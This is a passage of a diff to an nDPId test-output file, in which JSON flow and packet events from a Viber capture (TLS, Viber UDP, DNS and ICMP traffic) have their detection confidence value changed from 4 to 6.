00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1527155671240,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155671240,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0FZBAAEAG0gnAqAARNrtbtr+YAbtog5WtghP4IoAQAq0cfAAAAQEICgAhgE8sBh44"} -00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":276,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155671066,"flow_last_seen":1527155671250,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155671250,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":278,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155671066,"flow_last_seen":1527155671423,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1629,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155671423,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01266{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":281,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1527155671066,"flow_last_seen":1527155671423,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5054,"flow_avg_l4_payload_len":561,"midstream":0,"thread_ts_msec":1527155671423,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","server_names":"*.apptimize.com,apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Organization Validation Secure Server CA","subjectDN":"C=US, ST=CA, L=Mountain View, O=Apptimize, Inc, OU=PremiumSSL Wildcard, CN=*.apptimize.com","alpn":"http\/1.1","fingerprint":"BC:4C:8F:EC:8B:7B:85:BD:54:61:8B:C0:7B:E7:A2:69:0B:F2:49:E5"}} +00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":276,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155671066,"flow_last_seen":1527155671250,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155671250,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":278,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155671066,"flow_last_seen":1527155671423,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1629,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155671423,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01266{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":281,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1527155671066,"flow_last_seen":1527155671423,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5054,"flow_avg_l4_payload_len":561,"midstream":0,"thread_ts_msec":1527155671423,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","server_names":"*.apptimize.com,apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Organization Validation Secure Server CA","subjectDN":"C=US, ST=CA, L=Mountain View, O=Apptimize, Inc, OU=PremiumSSL Wildcard, CN=*.apptimize.com","alpn":"http\/1.1","fingerprint":"BC:4C:8F:EC:8B:7B:85:BD:54:61:8B:C0:7B:E7:A2:69:0B:F2:49:E5"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679410,"flow_last_seen":1527155679410,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155679410,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":33744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1527155679410,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155679410,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8V2ZAAEAGC9HAqAAREskEA4PQAbvgGt8vAAAAAKAC\/\/+jOgAAAgQFtAQCCAoAIYhJAAAAAAEDAwc="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679411,"flow_last_seen":1527155679411,"flow_idle_time":200000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1527155679411,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00783{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1527155679411,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"thread_ts_msec":1527155679411,"pkt":"AA6OMNv9MAdNo1+nCABFiAEdf+NAAEAR4d\/AqAAREskEA5UuHzEBCY\/LBbgBAAUANRj1GJhk5EcHridUEQCowC6VMgAAAEMBABABAPdbkpFjAQAAAAAAACXfTU7hzTcbXJq8JtnTC0sBuzmzAAAAAAAAAAADAAEAZgIAZwABeAAAAAAAAIAAGwkdkSv31AWZshbdezAt4SmQgEbXQ8gpESKVZEPm+yytcfHi3zlsEfu0kKTP5bAY2qxB7\/oc6uBQ0Wmie0yDB6SNCb6pEPHTLEjikG3nU2iKPCm3mBiaaSkNyyVaokw3bFWKZLztddqHjISoa\/0AQVn24h8Bz7MKBuS1UkASdYsAAAAAAAAAAEcFAAA4AAAAEABBbmRyb2lkLDguOS4wLjIAAAA="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679411,"flow_last_seen":1527155679411,"flow_idle_time":200000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1527155679411,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679411,"flow_last_seen":1527155679411,"flow_idle_time":200000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1527155679411,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7985,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"viber.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679411,"flow_last_seen":1527155679411,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1527155679411,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"viber.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1527155679411,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1527155679411,"pkt":"AA6OMNv9MAdNo1+nCABFiAA+f+RAAEAR4r3AqAAREskEA5UuHzMAKui4BbgZADUY9RiYZORHJd9NTuHNNxtcmrwm2dMLSwG7ObMAAA=="} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"viber.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679411,"flow_last_seen":1527155679411,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1527155679411,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7987,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"viber.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679411,"flow_last_seen":1527155679411,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1527155679411,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7987,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1527155679413,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1527155679413,"pkt":"AA6OMNv9MAdNo1+nCABFiAAuf+VAAEAR4szAqAAREskEA5UuHzEAGscOBbgRAAEAAAAuCDgEAAAHridU"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1527155679413,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1527155679413,"pkt":"AA6OMNv9MAdNo1+nCABFiAAwf+ZAAEAR4snAqAAREskEA5UuHzEAHM1MBbgJAPtbkpFjAQAANRj1GJhk5Ec="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"viber.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1527155679443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1527155679443,"pkt":"MAdNo1+nAA6OMNv9CABFAAAwpnZAACsR0cESyQQDwKgAER8zlS4AHM86BbgaADUY9RiYZORHMkN8Xi6VAMg="} @@ -126,62 +128,62 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1527155679444,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155679444,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0V2dAAEAGC9jAqAAREskEA4PQAbvgGt8wdKSu+oAQAq1ZEAAAAQEICgAhiFIA5FGt"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155685529,"flow_last_seen":1527155685529,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1527155685529,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1527155685529,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155685529,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8KqJAAEARjp7AqAARwKgAD8OxADUAKKNciEIBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE="} -00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":421,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155685529,"flow_last_seen":1527155685529,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1527155685529,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":421,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155685529,"flow_last_seen":1527155685529,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1527155685529,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1527155685530,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1527155685530,"pkt":"MAdNo1+nAA6OMNv9CABFAABMZZhAAEARU5jAqAAPwKgAEQA1w7EAOLypiEKBgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAABfAATYOs1k"} -00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":422,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155685529,"flow_last_seen":1527155685530,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1527155685530,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.205.100"}} +00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":422,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155685529,"flow_last_seen":1527155685530,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1527155685530,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.205.100"}} 00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155685757,"flow_last_seen":1527155685757,"flow_idle_time":140000,"flow_min_l4_payload_len":1480,"flow_max_l4_payload_len":1480,"flow_tot_l4_payload_len":1480,"flow_avg_l4_payload_len":1480,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 02402{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1527155685757,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1527155685757,"pkt":"AA6OMNv9MAdNo1+nCABFAAXcfu9AAEABNMHAqAARwKgADwgA3UOrGAABMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVI="} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155685757,"flow_last_seen":1527155685757,"flow_idle_time":140000,"flow_min_l4_payload_len":1480,"flow_max_l4_payload_len":1480,"flow_tot_l4_payload_len":1480,"flow_avg_l4_payload_len":1480,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.196204} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155685757,"flow_last_seen":1527155685757,"flow_idle_time":140000,"flow_min_l4_payload_len":1480,"flow_max_l4_payload_len":1480,"flow_tot_l4_payload_len":1480,"flow_avg_l4_payload_len":1480,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.196204} 02402{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1527155685757,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1527155685757,"pkt":"MAdNo1+nAA6OMNv9CABFAAXcOTwAAEABunTAqAAPwKgAEQAA5UOrGAABMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWF